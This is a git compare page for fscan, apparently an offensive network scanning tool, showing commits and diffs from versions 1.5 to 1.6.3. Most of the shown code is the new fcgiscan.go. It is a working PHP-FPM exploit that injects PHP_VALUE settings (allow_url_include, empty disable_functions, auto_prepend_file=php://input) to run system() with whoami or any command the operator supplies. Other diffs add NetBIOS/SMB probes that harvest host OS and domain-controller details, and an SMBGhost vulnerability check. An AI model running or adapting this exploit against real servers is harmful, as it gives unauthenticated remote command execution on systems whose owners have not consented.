source/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2026-02-10 02:39:18 +08:00
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: source:1.5
Branches Tags
source:main source:dev source:dev-2.1.1 source:dev-2.1.2 source:1.8.4-bak
source:v2.0.2 source:v2.0.1 source:2.0.0 source:1.8.4 source:1.8.3-build3 source:1.8.3-build2 source:1.8.3-build source:1.8.3 source:1.8.2 source:1.8.1 source:1.8.0 source:1.7.1 source:1.6.3 source:1.6.2 source:1.6.1 source:1.6.0 source:1.5.1 source:1.5 source:1.4 source:1.3.1 source:1.3 source:1.2 source:1.1 source:1.0
...
compare: source:1.6.3
Branches Tags
source:dev source:dev-2.1.1 source:dev-2.1.2 source:main source:1.8.4-bak
source:v2.0.2 source:v2.0.1 source:2.0.0 source:1.8.4 source:1.8.3-build3 source:1.8.3-build2 source:1.8.3-build source:1.8.3 source:1.8.2 source:1.8.1 source:1.8.0 source:1.7.1 source:1.6.3 source:1.6.2 source:1.6.1 source:1.6.0 source:1.5.1 source:1.5 source:1.4 source:1.3.1 source:1.3 source:1.2 source:1.1 source:1.0

91 Commits
1.5 ... 1.6.3

Author SHA1 Message Date
shadow1ng
c8ec4eab79 update README.md 2021-06-18 12:31:27 +08:00
shadow1ng
80fe8548c1 update icmp 2021-06-18 11:45:47 +08:00
shadow1ng
ad1c53e3f4 更新poc 2021-06-18 10:30:01 +08:00
shadow1ng
a8835a9fe4 Merge remote-tracking branch 'origin/main' into main 2021-06-18 09:57:27 +08:00
影舞者
db8acb2828 Merge pull request #67 from canc3s/main 
改善了poc机制和修复bug

还改善了一下poc的机制,如果识别出指纹会根据指纹信息发送poc,如果没有识别到指纹才会把所有poc打一遍
 2021-06-18 09:46:54 +08:00
影舞者
288338bc9d Update go.sum 2021-06-18 09:45:13 +08:00
影舞者
0743e4cb68 Update check.go 2021-06-18 09:38:30 +08:00
影舞者
6cdf1e19dc Update go.mod 2021-06-18 09:37:23 +08:00
canc3s
a427833e3f fix bug 
改善了poc机制和修复bug
 2021-06-17 20:32:53 +08:00
影舞者
d974523d88 Update ssh.go 2021-06-09 11:32:59 +08:00
shadow1ng
c90c9272f0 update 2021-06-09 11:16:23 +08:00
影舞者
a9e78b6de3 Merge pull request #63 from 7ten7/dev 
添加一个海康威视摄像头指纹
 2021-06-08 11:32:54 +08:00
7TEN7
ca1e0c791c 添加一个海康威视摄像头指纹 2021-06-08 01:07:39 +08:00
shadow1ng
90ef895e0f ssh模块加入私钥连接 2021-05-31 10:03:01 +08:00
shadow1ng
162d1dd3a3 优化icmp模块 2021-05-29 20:16:01 +08:00
shadow1ng
f3b0c4a6d2 update 2021-05-29 15:58:16 +08:00
shadow1ng
936c1f5395 update 2021-05-29 15:55:05 +08:00
shadow1ng
9d385eb26a 加入fcgi协议未授权命令执行扫描,优化poc模块 2021-05-29 12:13:10 +08:00
shadow1ng
61e814119d 修复ssh跳过问题 2021-05-27 14:19:21 +08:00
shadow1ng
f5c9667f91 webtitle update 2021-05-20 09:34:27 +08:00
shadow1ng
4f3ff608ab webtitle模块加入chardet 2021-05-18 16:23:50 +08:00
shadow1ng
0dd41e2917 更新指纹 2021-05-16 10:47:29 +08:00
shadow1ng
7031d78439 update redeme.md 2021-05-15 11:54:17 +08:00
shadow1ng
4431b42b35 添加打印机指纹 2021-05-14 16:02:22 +08:00
shadow1ng
b6133c4a55 增加-silent 静默扫描模式 2021-05-14 11:47:30 +08:00
shadow1ng
ef6a196de7 增加silent 静默扫描模式 2021-05-14 10:43:26 +08:00
shadow1ng
cd53258f0d 修复netbios模块数组越界 2021-05-14 10:24:04 +08:00
shadow1ng
93245a16d0 添加一个CheckErrs字典 2021-05-13 18:06:14 +08:00
shadow1ng
79aa24fc8f webtitle 增加gzip解码 2021-05-12 10:57:12 +08:00
shadow1ng
9aba1c88a3 删除elasticsearchScan,用yml poc代替 2021-05-06 11:44:38 +08:00
shadow1ng
400f4373c9 更新mod库、编码、poc等 2021-05-06 11:39:58 +08:00
shadow1ng
402add56c7 更新mod库、编码、poc等 2021-05-06 11:37:29 +08:00
shadow1ng
7294051b44 修改webtitle模块,加入gbk解码,减少乱码 2021-04-22 23:41:56 +08:00
shadow1ng
f1163fc3d7 加入 404星链 2021-04-22 12:06:03 +08:00
shadow1ng
2466fc3ea7 加入netbios探测、域控识别 2021-04-21 16:12:38 +08:00
shadow1ng
e2eba97114 加入netbios探测、域控识别 2021-04-21 16:02:52 +08:00
shadow1ng
fcbebab2ca 加入netbios探测、域控识别 2021-04-21 15:49:28 +08:00
shadow1ng
ab31738807 加入netbios探测、域控识别 2021-04-21 15:34:59 +08:00
shadow1ng
6bca014fda 加入netbios探测、域控识别 2021-04-21 15:34:29 +08:00
shadow1ng
27324dc4a5 加入netbios探测、域控识别 2021-04-21 00:13:04 +08:00
shadow1ng
323d786c66 update 2021-04-18 14:03:07 +08:00
shadow1ng
78fb5339e6 更新字典 2021-04-18 12:02:14 +08:00
shadow1ng
0d4299c23d 更新poc 2021-04-18 10:48:54 +08:00
shadow1ng
064617d93c 更新poc 2021-04-18 10:43:00 +08:00
shadow1ng
5537eb8b80 更新 CheckErrs 2021-04-18 10:38:46 +08:00
shadow1ng
067322203d 更新 CheckErrs 2021-04-01 10:39:01 +08:00
shadow1ng
7f2f7df67e 修改-debug参数,自定义打印当前进度时间,默认100秒没进制就会输出。-debug 0时,有err时就会输出 2021-03-31 17:58:40 +08:00
shadow1ng
6fae8bf277 修改-debug参数,自定义打印当前进度时间,默认100秒没进制就会输出。-debug 0时,有err时就会输出 2021-03-31 17:21:32 +08:00
shadow1ng
f4b6ecc363 添加exchange_ssrf_poc 2021-03-31 17:03:33 +08:00
shadow1ng
559d6c7c4b 修改线程处理机制 2021-03-30 22:33:16 +08:00
shadow1ng
7535fdace7 修改线程处理机制 2021-03-30 22:30:16 +08:00
shadow1ng
d6e8d37ce8 修改线程处理机制 2021-03-30 18:16:18 +08:00
shadow1ng
e43a7f5610 修改线程处理机制 2021-03-30 18:12:54 +08:00
shadow1ng
05d746bec4 update readme 2021-03-25 23:15:10 +08:00
shadow1ng
f7989d84bf update 2021-03-25 15:39:48 +08:00
shadow1ng
d503f55693 添加2个指纹 2021-03-25 15:36:21 +08:00
shadow1ng
e866d68f10 修改redis recover模块 2021-03-18 16:25:31 +08:00
shadow1ng
bb3222451c 修复一个错误拼写 2021-03-10 17:41:02 +08:00
shadow1ng
764e7723e1 修复一个错误拼写 2021-03-10 17:34:02 +08:00
shadow1ng
66cd740580 修复一个错误拼写 2021-03-10 14:42:30 +08:00
shadow1ng
41ec4489da 优化一下-m显示 2021-03-09 17:21:27 +08:00
shadow1ng
6ed5967705 添加redis还原dbname、dir 2021-03-09 17:00:06 +08:00
shadow1ng
d311d8cb79 调整portscan结构 2021-03-08 10:16:21 +08:00
shadow1ng
3ca56ff222 调整portscan结构 2021-03-08 10:00:56 +08:00
影舞者
5b330bb12d Merge pull request #32 from 7ten7/dev 
修复 -p 参数在某些情况下以范围指定端口时(如 -p 8000-10000)解析错误问题
 2021-03-06 01:35:56 +08:00
7TEN7
089502eb52 修复 -p 参数在某些情况下以范围指定端口时(如 -p 8000-10000)解析错误问题 2021-03-06 01:13:46 +08:00
shadow1ng
34706e6bca 修复一个web超时的bug 2021-03-05 11:44:21 +08:00
shadow1ng
ba85e2178e 支持-u url或者-uf url.txt,进行url批量扫描 2021-03-04 14:48:51 +08:00
shadow1ng
5e7def5085 支持-u url或者-uf url.txt,进行url批量扫描 2021-03-04 14:42:10 +08:00
影舞者
423c0bebea Merge pull request #30 from madneal/main 
fix for a judgement
 2021-03-03 09:36:49 +08:00
Neal Caffery
f3a3dd2f8c fix for a judgement 2021-03-03 09:24:17 +08:00
madneal
ae2a4621d4 no need for this judgement 2021-03-02 22:56:20 +08:00
影舞者
d79194389d Merge pull request #28 from MaxSecurity/main 
因为添加embed模块没更新go.mod导致无法正常编译报错
 2021-03-02 10:24:49 +08:00
Doctor_Who丶Max
86b91c1c2e Update go.mod 2021-03-02 10:21:32 +08:00
影舞者
5c000b2ffc Merge pull request #27 from madneal/main 
fix typos
 2021-03-01 22:06:29 +08:00
madneal
2ed5948d08 fix typos and replace Println with Printf 2021-03-01 22:02:27 +08:00
madneal
eb4cece0f9 replace Println with Printf 2021-03-01 21:59:47 +08:00
madneal
021592c237 fix typos 2021-03-01 21:55:19 +08:00
shadow1ng
8664cf3833 修改、添加poc 2021-02-28 15:20:18 +08:00
shadow1ng
41deddb132 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml 2021-02-25 19:53:58 +08:00
shadow1ng
0df4e314d1 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml 2021-02-25 17:54:56 +08:00
shadow1ng
79ea046ed2 修改yaml解析模块,支持密码爆破,如tomcat弱口令。yaml中新增sets参数,类型为数组,用于存放密码,具体看tomcat-manager-week.yaml 2021-02-25 17:53:35 +08:00
shadow1ng
db5023c4c4 减少http client初始化次数 2021-02-21 15:06:25 +08:00
shadow1ng
51b8b2c0e2 减少http client初始化次数 2021-02-21 14:54:40 +08:00
shadow1ng
583e51d479 减少http client初始化次数 2021-02-21 14:52:31 +08:00
shadow1ng
14c9847f88 增加指纹识别功能,可识别尝试CMS、框架,如致远OA、通达OA等 2021-02-08 15:13:56 +08:00
shadow1ng
f25eedff67 增加指纹识别功能,可识别尝试CMS、框架,如致远OA、通达OA等 2021-02-08 15:12:59 +08:00
shadow1ng
3089484f52 增加指纹识别功能,可识别尝试CMS、框架,如致远OA、通达OA等 2021-02-08 15:11:43 +08:00
shadow1ng
6b2fa57cd0 修复poc发包时16进制payload的bug 2021-02-08 11:11:27 +08:00
shadow1ng
9ba3ec7054 修改icmp发包模式,更适合大规模探测。 2021-02-05 16:08:28 +08:00
shadow1ng
8e148c0e6e 修改icmp发包模式,更适合大规模探测。 
修改报错提示,--debug时,如果10秒内没有LogSuccess的消息,每隔10秒就会打印一下当前进度
 2021-02-05 16:05:44 +08:00
138 changed files with 4245 additions and 41579 deletions
Expand all files Collapse all files

4
Plugins/CVE-2020-0796.go
View File

@@ -102,7 +102,7 @@ func SmbGhost(info *common.HostInfo) error {
func SmbGhostScan(info *common.HostInfo) error {
ip, port, timeout := info.Host, 445, time.Duration(info.Timeout)*time.Second
addr := fmt.Sprintf("%s:%d", info.Host, port)
addr := fmt.Sprintf("%s:%v", info.Host, port)
conn, err := net.DialTimeout("tcp", addr, timeout)
if err != nil {
return err
@@ -119,7 +119,7 @@ func SmbGhostScan(info *common.HostInfo) error {
}
defer conn.Close()
if bytes.Contains(buff[:n], []byte("Public")) == true {
result := fmt.Sprintf("%v CVE-2020-0796 SmbGhost Vulnerable", ip)
result := fmt.Sprintf("[+] %v CVE-2020-0796 SmbGhost Vulnerable", ip)
common.LogSuccess(result)
}

281
Plugins/NetBIOS.go Normal file
View File

@@ -0,0 +1,281 @@
package Plugins
import (
"bytes"
"fmt"
"github.com/shadow1ng/fscan/common"
"net"
"strconv"
"strings"
"time"
)
var (
UNIQUE_NAMES = map[string]string{
"\x00": "Workstation Service",
"\x03": "Messenger Service",
"\x06": "RAS Server Service",
"\x1F": "NetDDE Service",
"\x20": "Server Service",
"\x21": "RAS Client Service",
"\xBE": "Network Monitor Agent",
"\xBF": "Network Monitor Application",
"\x1D": "Master Browser",
"\x1B": "Domain Master Browser",
}
GROUP_NAMES = map[string]string{
"\x00": "Domain Name",
"\x1C": "Domain Controllers",
"\x1E": "Browser Service Elections",
}
NetBIOS_ITEM_TYPE = map[string]string{
"\x01\x00": "NetBIOS computer name",
"\x02\x00": "NetBIOS domain name",
"\x03\x00": "DNS computer name",
"\x04\x00": "DNS domain name",
"\x05\x00": "DNS tree name",
"\x07\x00": "Time stamp",
}
)
type NbnsName struct {
unique string
group string
msg string
osversion string
}
func NetBIOS(info *common.HostInfo) error {
nbname, err := NetBIOS1(info)
var msg, isdc string
if strings.Contains(nbname.msg, "Domain Controllers") {
isdc = "[+]DC"
}
msg += fmt.Sprintf("[*] %-15s%-5s %s\\%-15s %s", info.Host, isdc, nbname.group, nbname.unique, nbname.osversion)
if info.Scantype == "netbios" {
msg += "\n-------------------------------------------\n" + nbname.msg
}
if len(nbname.group) > 0 || len(nbname.unique) > 0 {
common.LogSuccess(msg)
}
return err
}
func NetBIOS1(info *common.HostInfo) (nbname NbnsName, err error) {
nbname, err = GetNbnsname(info)
var payload0 []byte
if err == nil {
name := netbiosEncode(nbname.unique)
payload0 = append(payload0, []byte("\x81\x00\x00D ")...)
payload0 = append(payload0, name...)
payload0 = append(payload0, []byte("\x00 EOENEBFACACACACACACACACACACACACA\x00")...)
}
realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
if err != nil {
return
}
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
if err != nil {
return
}
defer conn.Close()
if info.Ports == "139" && len(payload0) > 0 {
_, err1 := conn.Write(payload0)
if err1 != nil {
return
}
_, err1 = readbytes(conn)
if err1 != nil {
return
}
}
payload1 := []byte("\x00\x00\x00\x85\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00")
payload2 := []byte("\x00\x00\x01\x0a\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00\x0c\xff\x00\x0a\x01\x04\x41\x32\x00\x00\x00\x00\x00\x00\x00\x4a\x00\x00\x00\x00\x00\xd4\x00\x00\xa0\xcf\x00\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x02\xce\x0e\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00\x20\x00\x32\x00\x30\x00\x30\x00\x33\x00\x20\x00\x33\x00\x37\x00\x39\x00\x30\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x32\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x65\x00\x72\x00\x20\x00\x32\x00\x30\x00\x30\x00\x33\x00\x20\x00\x35\x00\x2e\x00\x32\x00\x00\x00\x00\x00")
_, err = conn.Write(payload1)
if err != nil {
return
}
_, err = readbytes(conn)
if err != nil {
return
}
_, err = conn.Write(payload2)
if err != nil {
return
}
ret, err := readbytes(conn)
if err != nil || len(ret) < 45 {
return
}
num1, err := bytetoint(ret[43:44][0])
if err != nil {
return
}
num2, err := bytetoint(ret[44:45][0])
if err != nil {
return
}
length := num1 + num2*256
if len(ret) < 48+length {
return
}
os_version := ret[47+length:]
tmp1 := bytes.ReplaceAll(os_version, []byte{0x00, 0x00}, []byte{124})
tmp1 = bytes.ReplaceAll(tmp1, []byte{0x00}, []byte{})
msg1 := string(tmp1[:len(tmp1)-1])
nbname.osversion = msg1
index1 := strings.Index(msg1, "|")
if index1 > 0 {
nbname.osversion = nbname.osversion[:index1]
}
nbname.msg += "-------------------------------------------\n"
nbname.msg += msg1 + "\n"
start := bytes.Index(ret, []byte("NTLMSSP"))
if len(ret) < start+45 {
return
}
num1, err = bytetoint(ret[start+40 : start+41][0])
if err != nil {
return
}
num2, err = bytetoint(ret[start+41 : start+42][0])
if err != nil {
return
}
length = num1 + num2*256
num1, err = bytetoint(ret[start+44 : start+45][0])
if err != nil {
return
}
offset, err := bytetoint(ret[start+44 : start+45][0])
if err != nil || len(ret) < start+offset+length {
return
}
index := start + offset
for index < start+offset+length {
item_type := ret[index : index+2]
num1, err = bytetoint(ret[index+2 : index+3][0])
if err != nil {
return
}
num2, err = bytetoint(ret[index+3 : index+4][0])
if err != nil {
return
}
item_length := num1 + num2*256
item_content := bytes.ReplaceAll(ret[index+4:index+4+item_length], []byte{0x00}, []byte{})
index += 4 + item_length
if string(item_type) == "\x07\x00" {
//Time stamp, 暂时不想处理
} else if NetBIOS_ITEM_TYPE[string(item_type)] != "" {
nbname.msg += fmt.Sprintf("%-22s: %s\n", NetBIOS_ITEM_TYPE[string(item_type)], string(item_content))
} else if string(item_type) == "\x00\x00" {
break
} else {
nbname.msg += fmt.Sprintf("Unknown: %s\n", string(item_content))
}
}
return nbname, err
}
func GetNbnsname(info *common.HostInfo) (nbname NbnsName, err error) {
senddata1 := []byte{102, 102, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 32, 67, 75, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 65, 0, 0, 33, 0, 1}
realhost := fmt.Sprintf("%s:%v", info.Host, 137)
conn, err := net.DialTimeout("udp", realhost, time.Duration(info.Timeout)*time.Second)
if err != nil {
return
}
err = conn.SetDeadline(time.Now().Add(time.Duration(info.Timeout) * time.Second))
if err != nil {
return
}
defer conn.Close()
_, err = conn.Write(senddata1)
if err != nil {
return
}
text, err := readbytes(conn)
if err != nil {
return
}
if len(text) < 57 {
return nbname, fmt.Errorf("no names available")
}
num, err := bytetoint(text[56:57][0])
if err != nil {
return
}
data := text[57:]
var msg string
for i := 0; i < num; i++ {
if len(data) < 18*i+16 {
break
}
name := string(data[18*i : 18*i+15])
flag_bit := data[18*i+15 : 18*i+16]
if GROUP_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" {
msg += fmt.Sprintf("%s G %s\n", name, GROUP_NAMES[string(flag_bit)])
} else if UNIQUE_NAMES[string(flag_bit)] != "" && string(flag_bit) != "\x00" {
msg += fmt.Sprintf("%s U %s\n", name, UNIQUE_NAMES[string(flag_bit)])
} else if string(flag_bit) == "\x00" || len(data) >= 18*i+18 {
name_flags := data[18*i+16 : 18*i+18][0]
if name_flags >= 128 {
nbname.group = strings.Replace(name, " ", "", -1)
msg += fmt.Sprintf("%s G %s\n", name, GROUP_NAMES[string(flag_bit)])
} else {
nbname.unique = strings.Replace(name, " ", "", -1)
msg += fmt.Sprintf("%s U %s\n", name, UNIQUE_NAMES[string(flag_bit)])
}
} else {
msg += fmt.Sprintf("%s \n", name)
}
}
nbname.msg += msg
return
}
func readbytes(conn net.Conn) (result []byte, err error) {
buf := make([]byte, 4096)
for {
count, err := conn.Read(buf)
if err != nil {
break
}
result = append(result, buf[0:count]...)
if count < 4096 {
break
}
}
return result, err
}
func bytetoint(text byte) (int, error) {
num1 := fmt.Sprintf("%v", text)
num, err := strconv.Atoi(num1)
return num, err
}
func netbiosEncode(name string) (output []byte) {
var names []int
src := fmt.Sprintf("%-16s", name)
for _, a := range src {
char_ord := int(a)
high_4_bits := char_ord >> 4
low_4_bits := char_ord & 0x0f
names = append(names, high_4_bits, low_4_bits)
}
for _, one := range names {
out := (one + 0x41)
output = append(output, byte(out))
}
return
}

25
Plugins/base.go
View File

@@ -1,18 +1,19 @@
package Plugins
var PluginList = map[string]interface{}{
"21": FtpScan,
"22": SshScan,
"135": Findnet,
"445": SmbScan,
"1433":MssqlScan,
"3306": MysqlScan,
"5432": PostgresScan,
"6379": RedisScan,
"9200":elasticsearchScan,
"11211":MemcachedScan,
"27017":MongodbScan,
"21": FtpScan,
"22": SshScan,
"135": Findnet,
"139": NetBIOS,
"445": SmbScan,
"1433": MssqlScan,
"3306": MysqlScan,
"5432": PostgresScan,
"6379": RedisScan,
"9000": FcgiScan,
"11211": MemcachedScan,
"27017": MongodbScan,
"1000001": MS17010,
"1000002": SmbGhost,
"1000003":WebTitle,
"1000003": WebTitle,
}

57
Plugins/elasticsearch.go
View File

@@ -1,57 +0,0 @@
package Plugins
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net"
"net/http"
"strings"
"time"
"github.com/shadow1ng/fscan/common"
)
func elasticsearchScan(info *common.HostInfo) error {
_, err := geturl2(info)
return err
}
func geturl2(info *common.HostInfo) (flag bool, err error) {
flag = false
url := fmt.Sprintf("%s:%d/_cat", info.Url, common.PORTList["elastic"])
var client = &http.Client{
Timeout: time.Duration(info.WebTimeout) * time.Second,
Transport: &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
DisableKeepAlives: false,
DialContext: (&net.Dialer{
Timeout: time.Duration(info.WebTimeout) * time.Second,
}).DialContext,
},
CheckRedirect: func(req *http.Request, via []*http.Request) error {
return http.ErrUseLastResponse
},
}
res, err := http.NewRequest("GET", url, nil)
if err == nil {
res.Header.Add("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
res.Header.Add("Accept", "*/*")
res.Header.Add("Accept-Language", "zh-CN,zh;q=0.9")
res.Header.Add("Accept-Encoding", "gzip, deflate")
res.Header.Add("Connection", "close")
resp, err := client.Do(res)
if err == nil {
defer resp.Body.Close()
body, _ := ioutil.ReadAll(resp.Body)
if strings.Contains(string(body), "/_cat/master") {
result := fmt.Sprintf("Elastic:%s unauthorized", url)
common.LogSuccess(result)
flag = true
}
}
}
return flag, err
}

365
Plugins/fcgiscan.go Normal file
View File

@@ -0,0 +1,365 @@
package Plugins
import (
"bufio"
"bytes"
"encoding/binary"
"errors"
"fmt"
"github.com/shadow1ng/fscan/common"
"io"
"net"
"strconv"
"strings"
"sync"
"time"
)
//links
//https://xz.aliyun.com/t/9544
//https://github.com/wofeiwo/webcgi-exploits
func FcgiScan(info *common.HostInfo) {
url := "/etc/issue"
if info.Path != "" {
url = info.Path
}
addr := fmt.Sprintf("%v:%v", info.Host, info.Ports)
var reqParams string
var cutLine = "-----ASDGTasdkk361363s-----\n"
switch {
case info.Command == "read":
reqParams = ""
case info.Command != "":
reqParams = "<?php system('" + info.Command + "');die('" + cutLine + "');?>"
default:
reqParams = "<?php system('whoami');die('" + cutLine + "');?>"
}
env := make(map[string]string)
env["SCRIPT_FILENAME"] = url
env["DOCUMENT_ROOT"] = "/"
env["SERVER_SOFTWARE"] = "go / fcgiclient "
env["REMOTE_ADDR"] = "127.0.0.1"
env["SERVER_PROTOCOL"] = "HTTP/1.1"
if len(reqParams) != 0 {
env["CONTENT_LENGTH"] = strconv.Itoa(len(reqParams))
env["REQUEST_METHOD"] = "POST"
env["PHP_VALUE"] = "allow_url_include = On\ndisable_functions = \nauto_prepend_file = php://input"
} else {
env["REQUEST_METHOD"] = "GET"
}
fcgi, err := New(addr, info.Timeout)
if err != nil {
errlog := fmt.Sprintf("[-] fcgi %v:%v %v", info.Host, info.Ports, err)
common.LogError(errlog)
return
}
stdout, stderr, err := fcgi.Request(env, reqParams)
if err != nil {
errlog := fmt.Sprintf("[-] fcgi %v:%v %v", info.Host, info.Ports, err)
common.LogError(errlog)
return
}
//1
//Content-type: text/html
//
//uid=1001(www) gid=1001(www) groups=1001(www)
//2
//Status: 404 Not Found
//Content-type: text/html
//
//File not found.
//Primary script unknown
//3
//Status: 403 Forbidden
//Content-type: text/html
//
//Access denied.
//Access to the script '/etc/passwd' has been denied (see security.limit_extensions)
var result string
var output = string(stdout)
if strings.Contains(string(stdout), cutLine) { //命令成功回显
output = strings.SplitN(string(stdout), cutLine, 2)[0]
if len(stderr) > 0 {
result = fmt.Sprintf("[+] FCGI:%v:%v \n%vstderr:%v\nplesa try other path,as -path /www/wwwroot/index.php", info.Host, info.Ports, output, string(stderr))
} else {
result = fmt.Sprintf("[+] FCGI:%v:%v \n%v", info.Host, info.Ports, output)
}
common.LogSuccess(result)
} else if strings.Contains(string(stdout), "File not found") || strings.Contains(string(stdout), "Content-type") || strings.Contains(string(stdout), "Status") {
if len(stderr) > 0 {
result = fmt.Sprintf("[+] FCGI:%v:%v \n%vstderr:%v\nplesa try other path,as -path /www/wwwroot/index.php", info.Host, info.Ports, string(stdout), string(stderr))
} else {
result = fmt.Sprintf("[+] FCGI:%v:%v \n%v", info.Host, info.Ports, string(stdout))
}
common.LogSuccess(result)
}
}
// for padding so we don't have to allocate all the time
// not synchronized because we don't care what the contents are
var pad [maxPad]byte
const (
FCGI_BEGIN_REQUEST uint8 = iota + 1
FCGI_ABORT_REQUEST
FCGI_END_REQUEST
FCGI_PARAMS
FCGI_STDIN
FCGI_STDOUT
FCGI_STDERR
)
const (
FCGI_RESPONDER uint8 = iota + 1
)
const (
maxWrite = 6553500 // maximum record body
maxPad = 255
)
type header struct {
Version uint8
Type uint8
Id uint16
ContentLength uint16
PaddingLength uint8
Reserved uint8
}
func (h *header) init(recType uint8, reqId uint16, contentLength int) {
h.Version = 1
h.Type = recType
h.Id = reqId
h.ContentLength = uint16(contentLength)
h.PaddingLength = uint8(-contentLength & 7)
}
type record struct {
h header
buf [maxWrite + maxPad]byte
}
func (rec *record) read(r io.Reader) (err error) {
if err = binary.Read(r, binary.BigEndian, &rec.h); err != nil {
return err
}
if rec.h.Version != 1 {
return errors.New("fcgi: invalid header version")
}
n := int(rec.h.ContentLength) + int(rec.h.PaddingLength)
if _, err = io.ReadFull(r, rec.buf[:n]); err != nil {
return err
}
return nil
}
func (r *record) content() []byte {
return r.buf[:r.h.ContentLength]
}
type FCGIClient struct {
mutex sync.Mutex
rwc io.ReadWriteCloser
h header
buf bytes.Buffer
keepAlive bool
}
func New(addr string, timeout int64) (fcgi *FCGIClient, err error) {
conn, err := net.DialTimeout("tcp", addr, time.Duration(timeout)*time.Second)
fcgi = &FCGIClient{
rwc: conn,
keepAlive: false,
}
return
}
func (this *FCGIClient) writeRecord(recType uint8, reqId uint16, content []byte) (err error) {
this.mutex.Lock()
defer this.mutex.Unlock()
this.buf.Reset()
this.h.init(recType, reqId, len(content))
if err := binary.Write(&this.buf, binary.BigEndian, this.h); err != nil {
return err
}
if _, err := this.buf.Write(content); err != nil {
return err
}
if _, err := this.buf.Write(pad[:this.h.PaddingLength]); err != nil {
return err
}
_, err = this.rwc.Write(this.buf.Bytes())
return err
}
func (this *FCGIClient) writeBeginRequest(reqId uint16, role uint16, flags uint8) error {
b := [8]byte{byte(role >> 8), byte(role), flags}
return this.writeRecord(FCGI_BEGIN_REQUEST, reqId, b[:])
}
func (this *FCGIClient) writeEndRequest(reqId uint16, appStatus int, protocolStatus uint8) error {
b := make([]byte, 8)
binary.BigEndian.PutUint32(b, uint32(appStatus))
b[4] = protocolStatus
return this.writeRecord(FCGI_END_REQUEST, reqId, b)
}
func (this *FCGIClient) writePairs(recType uint8, reqId uint16, pairs map[string]string) error {
w := newWriter(this, recType, reqId)
b := make([]byte, 8)
for k, v := range pairs {
n := encodeSize(b, uint32(len(k)))
n += encodeSize(b[n:], uint32(len(v)))
if _, err := w.Write(b[:n]); err != nil {
return err
}
if _, err := w.WriteString(k); err != nil {
return err
}
if _, err := w.WriteString(v); err != nil {
return err
}
}
w.Close()
return nil
}
func readSize(s []byte) (uint32, int) {
if len(s) == 0 {
return 0, 0
}
size, n := uint32(s[0]), 1
if size&(1<<7) != 0 {
if len(s) < 4 {
return 0, 0
}
n = 4
size = binary.BigEndian.Uint32(s)
size &^= 1 << 31
}
return size, n
}
func readString(s []byte, size uint32) string {
if size > uint32(len(s)) {
return ""
}
return string(s[:size])
}
func encodeSize(b []byte, size uint32) int {
if size > 127 {
size |= 1 << 31
binary.BigEndian.PutUint32(b, size)
return 4
}
b[0] = byte(size)
return 1
}
// bufWriter encapsulates bufio.Writer but also closes the underlying stream when
// Closed.
type bufWriter struct {
closer io.Closer
*bufio.Writer
}
func (w *bufWriter) Close() error {
if err := w.Writer.Flush(); err != nil {
w.closer.Close()
return err
}
return w.closer.Close()
}
func newWriter(c *FCGIClient, recType uint8, reqId uint16) *bufWriter {
s := &streamWriter{c: c, recType: recType, reqId: reqId}
w := bufio.NewWriterSize(s, maxWrite)
return &bufWriter{s, w}
}
// streamWriter abstracts out the separation of a stream into discrete records.
// It only writes maxWrite bytes at a time.
type streamWriter struct {
c *FCGIClient
recType uint8
reqId uint16
}
func (w *streamWriter) Write(p []byte) (int, error) {
nn := 0
for len(p) > 0 {
n := len(p)
if n > maxWrite {
n = maxWrite
}
if err := w.c.writeRecord(w.recType, w.reqId, p[:n]); err != nil {
return nn, err
}
nn += n
p = p[n:]
}
return nn, nil
}
